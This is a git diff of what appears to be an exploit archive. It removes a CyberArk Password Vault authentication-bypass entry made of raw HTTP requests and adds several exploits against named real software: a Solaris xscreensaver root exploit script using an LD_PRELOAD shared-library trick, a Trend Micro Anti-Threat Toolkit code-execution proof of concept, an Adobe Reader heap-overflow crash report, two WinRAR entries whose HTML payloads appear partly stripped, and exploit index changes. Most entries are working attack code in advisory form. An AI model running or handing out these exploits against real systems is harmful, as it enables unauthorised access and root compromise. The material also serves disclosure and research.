diff --git a/exploits/linux/webapps/47512.txt b/exploits/linux/webapps/47512.txt deleted file mode 100644 index 59f3aaec6..000000000 --- a/exploits/linux/webapps/47512.txt +++ /dev/null @@ -1,80 +0,0 @@ -# Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass -# Date: 2019-10-16 -# Author: Daniel Martinez Adan (adon90) -# Vendor: https://www.cyberark.com -# Software: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/ -# Collaborator: Luis Buendía (exoticpayloads) -# Version Affected: All - -# It is possible to retrieve a valid cookie by injecting special characters -# in the username field: - -vulnerable parameter: -pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername - -URL: -/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx - -Payload: -%1F - -# Requirements: -# Using a valid ViewState -> if it doesn't work, go to the login panel to -# automatically generate a valid ViewState - - -# Once the valid cookie is obtained, it is posible to perform multiple -# actions in the PasswordVault such us: -# - Retrieving valid user information (Name, Email, Phone number….) -# - DoS -# - DNS enumeration via ip address -# - Possibly deleting users - - -# Login Bypass: - -POST /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx HTTP/1.1 -Host: TARGET -User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 -Accept-Encoding: gzip, deflate -Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx -Content-Type: application/x-www-form-urlencoded -Content-Length: 2435 -Connection: close -Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca -Upgrade-Insecure-Requests: 1 -__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=gjUPDVmn3eCu84zX77GBo4yZO5ypQSyENJ%2FiPcWTNRTh9MtlLoZ6wvk6nCnoK8MeZfh%2BUA9fqjr80wBpvTA04Xkq8mnhgITyUkAx8PuG09vlGK7CBUxV4PHxPooSWtC%2F2RccxoRIuCucsVDXD27UTCiS4VmDoUWDORoecURYhzV2PH7pXm4XGNtNxeI%2FuLXPvwVYAOYkyUZZloZALalGC54rL24Iery7YR0uYvaC61OmxhCtYVy8zHlu7p2fK%2FUHxGxw3oMKrVJA%2BTCT1%2B5AoO4apN7uA%2BBmJzFhcl9vPrdlgCdu%2F1Ei%2F1O0oVn6BOd%2BhFDHdDbpKAX6xIJAWRfb9%2BGG8qobGKR%2B8Fvhao9hx3oCieBe7BvJL%2Fe9Y61tLtvnoLBHwc7uvG4V1lg5oNcQQeEZTGosZ3xrt3dR3kZe2b6vY0QG8YVlJCv56Xb1Ylr7mI7FIbUbKxbZvIkIPrPlKTvkzUTYGXsBOVXNy9KyAhI2%2B9DVkTFFhp%2FK4uWMCMxVq%2FgRxiEyukUbWvobQxSnUH4aNntJiD0Nmlc6UzwNxfvo%2FUNJx8i0yoPoi4PMomsQTE6%2FjtAQiO9rrf6syMLp2lLqXzQ7u90BqyUB9%2BOkn2C2AKZcir2KyT4vGcVOgEfUiZ7twd%2B4uq4acPpQBNto3zBCtgtKzW5iv8TfSCRuigtaT7Oz5qZvWq7UX%2Bqye9cugocb%2BUbaWVXJqcy0Gkdm0BPrRpiCbkSYqfx%2Fo7fYuDjEnMhXrOwBCUOfHhAcjXHZeeJY%2FKsnRP0Aa2%2BNzCOPimbvVEIq0CzTonYV6WFh1a0aDc0m8Qgchz9RnYR67efSftSQYpPzsBIdp0MsFuZ5AmSPROHH37N0zWVV%2BlVvPfwuSlLFV8d5Kq41KJtucYwenrZMq7lhKcDvaRZz5LOFR71DdrYwZoPloK4BK3yl8w8GaOnyRSQsQ0yW4xj5RbJLKN5J54I2fXDkgIVMJY6dbsztZ2JO%2BTpa5xPjJCIjXTR%2B4pJTqCBWc%2FLJ0xzz6x2EOOP9eMY8RH3GaEdg8Lww66zOzpIyXiOBT0VqyRTDxVd2UnEwJZDqwmcHh1n1nN%2BAQoWk2aJDBev9WiGLSx2GxtipLElZsWTcG5txklqFKB7b5mG2jIsx4%2B%2BRlAz2q6b8YJxKem1FnJwQhTyWZ5%2BgEnEGYIylH%2FsYP2eOcBJr5J7gamu%2FsqF9fZa4AJHxEx%2BspDmzm607z8H2AqOhWRemllMT87KVlCuTKiWw3gj7bhj19KtaE1AwmHid5ISXbt%2F5Gcw4LDvDkmfR1akym0jPGdECSyJG0qbhKiE3abdXESlMCURfX6g1W%2B9i8WZJ4hDtHcsPudD6yhp32NSDa2eVqw%3D%3D&__VIEWSTATEGENERATOR=4EAA75BD&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=yRuqYr%2BEabjm0oMhAb6WmehsX2QOYJhKOP0z9IJq8R2B9Md%2Fi17pZwRXSuLkNN72eNRdEnD%2Fcjr3L3KJLehz7ol6U%2BUONvRqU3dO66PrJIvFj%2BDji4%2FvZeOpLeaI0nY9mSU7%2FdBiOgLzdPnDtNu9G%2BwlR4Z8FdWPayd8UDMqShb%2FmObsqqsoxooNVf8jUFa1X98oKyPHztYNS6ip8fIBl4ksqvsPQhZnc%2Fj%2FniKwWp2GZ%2FmnEhIYMxVVx5tirrB16M4dJqa5ROmxuL%2FJcnW0hqFlAkAycTdep5r0nvN1kXXrIco4RhE52ZbP9yKpr5%2FOyVASLr42dCgOSKXcgkFL1A%3D%3D&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername=%1F&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AbtnLogon=Sign+in&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword2Hidden=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3APasswordHidden=admin&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword1Hidden=&AuthModuleUsed=radius&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ASkipChangePwd= - - -# User Information: - -POST /PasswordVault/services/PrivilegedAccountAccess.asmx/GetUserDetails HTTP/1.1 -Host: TARGET -User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 -Accept-Encoding: gzip, deflate -Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx -Connection: close -Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109 -Upgrade-Insecure-Requests: 1 -Content-Type: application/json -Content-Length: 28 -{"userName":"administrator"} - - -# Resolve DNS / DoS - -GET /PasswordVault/ResolveMachineAddress.aspx?data=&moreinfo=127.0.0.1 HTTP/1.1 -Host: TARGET -User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 -Accept-Encoding: gzip, deflate -CAAjax: adon90 -Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx -Connection: close -Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109 -Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/solaris/local/47529.txt b/exploits/solaris/local/47529.txt new file mode 100644 index 000000000..0288c5fa6 --- /dev/null +++ b/exploits/solaris/local/47529.txt @@ -0,0 +1,168 @@ +@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16) + + Title: Local privilege escalation on Solaris 11.x via xscreensaver + Application: Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4 + Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3 + Other versions starting from 5.06 are potentially affected + Platforms: Oracle Solaris 11.x (tested on 11.4 and 11.3) + Other platforms are potentially affected (see below) + Description: A local attacker can gain root privileges by exploiting a + design error vulnerability in the xscreensaver distributed with + Solaris + Author: Marco Ivaldi + Vendor Status: notified on 2019-07-09 + CVE Name: CVE-2019-3010 + CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8) + References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt + https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html + https://www.jwz.org/xscreensaver/ + https://www.oracle.com/technetwork/server-storage/solaris11/ + https://www.mediaservice.net/ + https://0xdeadbeef.info/ + +1. Abstract. + +Exploitation of a design error vulnerability in xscreensaver, as distributed +with Solaris 11.x, allows local attackers to create (or append to) arbitrary +files on the system, by abusing the -log command line switch introduced in +version 5.06. This flaw can be leveraged to cause a denial of service condition +or to escalate privileges to root. + +2. Example Attack Session. + +raptor@stalker:~$ cat /etc/release + Oracle Solaris 11.4 X86 + Copyright (c) 1983, 2018, Oracle and/or its affiliates. All rights reserved. + Assembled 16 August 2018 +raptor@stalker:~$ uname -a +SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc +raptor@stalker:~$ id +uid=100(raptor) gid=10(staff) +raptor@stalker:~$ chmod +x raptor_xscreensaver +raptor@stalker:~$ ./raptor_xscreensaver +raptor_xscreensaver - Solaris 11.x LPE via xscreensaver +Copyright (c) 2019 Marco Ivaldi +[...] +Oracle Corporation SunOS 5.11 11.4 Aug 2018 +root@stalker:~# id +uid=0(root) gid=0(root) + +3. Affected Platforms. + +This vulnerability was confirmed on the following platforms: + +* Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation] +* Oracle Solaris 11.x SPARC [untested] + +Previous Oracle Solaris 11 versions might also be vulnerable. + +Based on our analysis and on feedback kindly provided by Alan Coopersmith of +Oracle, we concluded that this is a Solaris-specific vulnerability, caused by +the fact that Oracle maintains a slightly different codebase from the upstream +one. Alan explained this as follows: + +"The problem in question here appears to be inherited from the long-ago fork +[originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based +unlock dialog with accessibility support to replace the non-accessible Xlib +unlock dialog that upstream provides, which moves the uid reset to after where +the log file opening was later added." + +Specifically, the problem arises because of this bit of Solaris patches: +https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770 + +As an interesting side note, it appears Red Hat dropped this code back in 2002 +with version 4.05-5: +https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179 + +4. Fix. + +Oracle has assigned the tracking# S1182608 and has released a fix for all +affected and supported versions of Solaris in their Critical Patch Update (CPU) +of October 2019. + +As a temporary workaround, it is also possible to remove the setuid bit from +the xscreensaver executable as follows (note that this might prevent it from +working properly): + +bash-3.2# chmod -s /usr/bin/xscreensaver + +5. Proof of Concept. + +An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It +can be downloaded from: + +https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver + +#!/bin/sh + +# +# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver +# Copyright (c) 2019 Marco Ivaldi +# +# Exploitation of a design error vulnerability in xscreensaver, as +# distributed with Solaris 11.x, allows local attackers to create +# (or append to) arbitrary files on the system, by abusing the -log +# command line switch introduced in version 5.06. This flaw can be +# leveraged to cause a denial of service condition or to escalate +# privileges to root. This is a Solaris-specific vulnerability, +# caused by the fact that Oracle maintains a slightly different +# codebase from the upstream one (CVE-2019-3010). +# +# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs +# "Good hackers force luck." -- ~A. +# +# This exploit targets the /usr/lib/secure/ directory in order +# to escalate privileges with the LD_PRELOAD technique. The +# implementation of other exploitation vectors, including those +# that do not require gcc to be present on the target system, is +# left as an exercise to fellow UNIX hackers;) +# +# Usage: +# raptor@stalker:~$ chmod +x raptor_xscreensaver +# raptor@stalker:~$ ./raptor_xscreensaver +# [...] +# Oracle Corporation SunOS 5.11 11.4 Aug 2018 +# root@stalker:~# id +# uid=0(root) gid=0(root) +# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.* +# +# Vulnerable platforms: +# Oracle Solaris 11 X86 [tested on 11.4 and 11.3] +# Oracle Solaris 11 SPARC [untested] +# + +echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver" +echo "Copyright (c) 2019 Marco Ivaldi " +echo + +# prepare the payload +echo "int getuid(){return 0;}" > /tmp/getuid.c +gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc +if [ $? -ne 0 ]; then +echo "error: problem compiling the shared library, check your gcc" +exit 1 +fi + +# check the architecture +LOG=/usr/lib/secure/getuid.so +file /bin/su | grep 64-bit >/dev/null 2>&1 +if [ $? -eq 0 ]; then +LOG=/usr/lib/secure/64/getuid.so +fi + +# start our own xserver +# alternatively we can connect back to a valid xserver (e.g. xquartz) +/usr/bin/Xorg :1 & + +# trigger the bug +umask 0 +/usr/bin/xscreensaver -display :1 -log $LOG & +sleep 5 + +# clean up +pkill -n xscreensaver +pkill -n Xorg + +# LD_PRELOAD-fu +cp /tmp/getuid.so $LOG +LD_PRELOAD=$LOG su - \ No newline at end of file diff --git a/exploits/windows/dos/47525.txt b/exploits/windows/dos/47525.txt new file mode 100644 index 000000000..117a45982 --- /dev/null +++ b/exploits/windows/dos/47525.txt @@ -0,0 +1,73 @@ +# Exploit Title: winrar 5.80 64bit - Denial of Service +# Date: 2019-10-19 +# Exploit Author: alblalawi +# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe +# Version: 5.80 +# Tested on: Microsoft Windows Version 10.0.18362.418 64bit + +# 1- open winrar or any file.rar +# 2- help +# 3- help topics +# 4- Drag the exploit to the window + +# Save the content html + + + + \ No newline at end of file diff --git a/exploits/windows/dos/47528.txt b/exploits/windows/dos/47528.txt new file mode 100644 index 000000000..35860811a --- /dev/null +++ b/exploits/windows/dos/47528.txt @@ -0,0 +1,85 @@ +We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: + +--- cut --- +(7f2c.8be8): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00000080 ebx=00001b52 ecx=00000080 edx=00000080 esi=00000001 edi=6f587000 +eip=6a005324 esp=050fbc14 ebp=050fbc34 iopl=0 nv up ei pl nz na po nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 +JP2KLib!IJP2KException::GetErrString+0x3224: +6a005324 8817 mov byte ptr [edi],dl ds:002b:6f587000=?? + +0:000> kb + # ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +00 050fbc34 6a0030e8 00001b52 00001b53 00000000 JP2KLib!IJP2KException::GetErrString+0x3224 +01 050fbcb0 69ff3bf0 0000000a 000002ce 00000001 JP2KLib!IJP2KException::GetErrString+0xfe8 +02 050fbd44 69ff4132 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe9d0 +03 050fbda0 69ff43f9 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xef12 +04 050fbdc8 69ff37bc 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xf1d9 +05 050fbe7c 69ff31eb 050fbf88 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe59c +06 050fbebc 6a005d8a 0000000d 00000008 000000ff JP2KLib!JP2KCopyRect+0xdfcb +07 050fbf1c 5f721b53 62c74e88 0000000d 00000008 JP2KLib!JP2KImageDecodeImageRegion+0x2a +08 050fbf9c 5f71544b 6ad22fac 050fbfcc 5f115889 AcroRd32!AX_PDXlateToHostEx+0x343e93 +09 050fbfa8 5f115889 6ad22fac 62c7cfb0 5f1157f0 AcroRd32!AX_PDXlateToHostEx+0x33778b +0a 050fbfcc 5f115783 6ad0efe0 00000001 0000001b AcroRd32!DllCanUnloadNow+0x4c929 +0b 050fbfec 5f561d7a 050fc010 6ad0efe0 0000001b AcroRd32!DllCanUnloadNow+0x4c823 +0c 050fc030 5f24afc8 c0020000 00000004 6ad0efe0 AcroRd32!AX_PDXlateToHostEx+0x1840ba +0d 050fc384 5f24a506 050fc3e0 53406a98 95e3efd6 AcroRd32!DllCanUnloadNow+0x182068 +0e 050fc3bc 5f24a3e1 050fc3e0 53406a98 050fc44c AcroRd32!DllCanUnloadNow+0x1815a6 +0f 050fc428 5f2493a8 c0020000 00000004 53406a98 AcroRd32!DllCanUnloadNow+0x181481 +10 050fc888 5f2468f7 050fcb8c 686e45ac c0020000 AcroRd32!DllCanUnloadNow+0x180448 +11 050fe068 5f246575 686e45ac c0020000 00000004 AcroRd32!DllCanUnloadNow+0x17d997 +12 050fe138 5f22a25c 95e3ce72 5d91af78 00000000 AcroRd32!DllCanUnloadNow+0x17d615 +13 050fe218 5f229057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc +14 050fe264 5f21c183 5d91af78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7 +15 050fe3d8 5f21ba97 553e6dbc 00000001 6a169ef8 AcroRd32!DllCanUnloadNow+0x153223 +16 050fe440 5f219281 95e3c8aa 5323efc8 5adccea8 AcroRd32!DllCanUnloadNow+0x152b37 +17 050fe4c0 5f218dae 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x150321 +18 050fe4fc 5f218d07 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x14fe4e +19 050fe584 5f2182ee 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14fda7 +1a 050fe5c0 5f216f02 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14f38e +1b 050fe884 5f215d98 6a169ef8 050fe918 050fe968 AcroRd32!DllCanUnloadNow+0x14dfa2 +1c 050fe988 5f2143b8 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14ce38 +1d 050fe9ec 5f21414d 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b458 +1e 050fea0c 5f212d3c 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed +1f 050feac4 5f212762 00000001 00000000 95e3c776 AcroRd32!DllCanUnloadNow+0x149ddc +20 050feb1c 5f21257a 7d8b4ef0 00000001 95e3c7ea AcroRd32!DllCanUnloadNow+0x149802 +21 050feb80 5f2122ff 050fec74 95e3c0fe 80882fa0 AcroRd32!DllCanUnloadNow+0x14961a +22 050fec94 5f0d687c 80882fa0 5f0d67a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f +23 050fecac 5f0d678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c +24 050fecc8 745de0bb 00180a60 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f +25 050fecf4 745e8849 5f0d66d0 00180a60 0000000f USER32!_InternalCallWinProc+0x2b +26 050fed18 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20 +27 050fede8 745d8503 5f0d66d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be +28 050fee50 745d8aa0 147683c0 00000000 0000000f USER32!DispatchClientMessage+0x1b3 +29 050fee98 77371a6d 050feeb4 00000020 050fef14 USER32!__fnDWORD+0x50 +2a 050feed0 745d91ee 050fef64 5a5cb65c 18836dd8 ntdll!KiUserCallbackDispatcher+0x4d +2b 050fef24 745d8c20 5f535978 050fef48 5f0eda6d USER32!DispatchMessageWorker+0x5be +2c 050fef30 5f0eda6d 050fef64 18836dd8 18836dd8 USER32!DispatchMessageW+0x10 +2d 050fef48 5f0ed89e 050fef64 95e3c3d6 18836dd8 AcroRd32!DllCanUnloadNow+0x24b0d +2e 050fefbc 5f0ed744 95e3c39e 18836dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e +2f 050feff4 5f07c575 95e3dc0e 17484ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4 +30 050ff064 5f07bf81 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x775 +31 050ff484 0011783d 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x181 +32 050ff850 002201aa 00110000 00000000 0bd5b3f2 AcroRd32_exe+0x783d +33 050ff89c 76698674 04f5f000 76698650 c83dc0c6 AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da +34 050ff8b0 77365e17 04f5f000 07a6f6f5 00000000 KERNEL32!BaseThreadInitThunk+0x24 +35 050ff8f8 77365de7 ffffffff 7738ad9e 00000000 ntdll!__RtlUserThreadStart+0x2f +36 050ff908 00000000 00111390 04f5f000 00000000 ntdll!_RtlUserThreadStart+0x1b +--- cut --- + +Notes: + +- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled. + +- The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer. + +- Attached samples: poc.pdf (crashing file), original.pdf (original file). + +- We have minimized the difference between the original and mutated files down to 5 bytes inside of a binary JP2 image stream: 4 bytes at offset 0x195 changed from to <00 00 00 C0>, and 1 byte at offset 0x1ED changed from <0x53> to <0x5B>. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47528.zip \ No newline at end of file diff --git a/exploits/windows/local/47527.txt b/exploits/windows/local/47527.txt new file mode 100644 index 000000000..b259c12f0 --- /dev/null +++ b/exploits/windows/local/47527.txt @@ -0,0 +1,112 @@ +# Exploit Title: Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution +# Date: 2019-10-19 +# Exploit Author: hyp3rlinx +# Vendor Homepage: www.trendmicro.com +# Version: 1.62.0.1218 and below +# Tested on: Microsoft Windows +# CVE: N/A + + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt +[+] ISR: Apparition Security + + +[Vendor] +www.trendmicro.com + + +[Product] +Trend Micro Anti-Threat Toolkit (ATTK) +1.62.0.1218 and below + +Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections. +It can be used to perform system forensic scans and clean the following infection types: + +General malware infection +Master boot record Infection +CIDOX/ RODNIX infection +Rootkit infection +Zbot infection +Cryptolocker infection +etc.. + + +[Vulnerability Type] +Remote Code Execution + + +[CVE Reference] +CVE-2019-9491 + + +[Security Issue] +Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author +happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be +placed in the vacinity of the ATTK when a scan is launched by the end user. + +Since the ATTK is signed by verified publisher and therefore assumed trusted any MOTW security warnings +are bypassed if the malware was internet downloaded, also it can become a persistence mechanism as +each time the Anti-Threat Toolkit is run so can an attackers malware. + +Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.) + +attk_collector_cli_x64.exe +Hash: e8503e9897fd56eac0ce3c3f6db24fb1 + +TrendMicroRansomwareCollector64.r09.exe +Hash: 798039027bb4363dcfd264c14267375f + +attk_ScanCleanOnline_gui_x64.exe +Hash: f1d2ca4b14368911c767873cdbc194ed + + +[References] +https://success.trendmicro.com/solution/000149878 +*All versions of the ATTK have been updated with the newer version. Anti-Threat Toolkit (ATTK) 1.62.0.1223 + + +[Exploit/POC] +Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe". +Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed. + +#include + +void main(void){ + puts("Trend Micro Anti-Threat Toolkit PWNED!"); + puts("Discovery: hyp3rlinx"); + puts("CVE-2019-9491\n"); + WinExec("powershell", 0); +} + + +[POC Video URL] +https://www.youtube.com/watch?v=HBrRVe8WCHs + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: September 9, 2019 +Vendor confirms vulnerability: September 25, 2019 +Vendor requests to coordinate advisory: September 25, 2019 +October 19, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/xml/local/47526.txt b/exploits/xml/local/47526.txt new file mode 100644 index 000000000..af8eea29a --- /dev/null +++ b/exploits/xml/local/47526.txt @@ -0,0 +1,38 @@ +# Exploit Title: winrar 5.80 - XML External Entity Injection +# Exploit Author: albalawi +# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe +# Version: 5.80 +# Tested on: Microsoft Windows Version 10.0.18362.418 64bit + +# POC + +1- python -m SimpleHTTPServer (listens Port 8000) +2- open winrar or any file.rar +3- help +4- help topics +5- Drag the exploit to the window + + +html file + + + + + + + +%dtd;]> +&send; + + + + + + +============================== +start.dtd + + +"> +%all; \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e47939e03..6a627cf98 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6579,6 +6579,8 @@ id,file,description,date,author,type,platform,port 47489,exploits/windows/dos/47489.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows, 47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows, 47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows, +47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows, +47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10716,7 +10718,7 @@ id,file,description,date,author,type,platform,port 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux, 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows, 47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows, -47502,exploits/linux/local/47502.py,"sudo 1.2.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux, +47502,exploits/linux/local/47502.py,"sudo 1.8.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux, 47503,exploits/windows/local/47503.txt,"ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path",2019-10-15,cakes,local,windows, 47504,exploits/windows/local/47504.txt,"Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path",2019-10-16,"Luis MedinaL",local,windows, 47506,exploits/windows/local/47506.txt,"Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path",2019-10-16,cakes,local,windows, @@ -10727,6 +10729,9 @@ 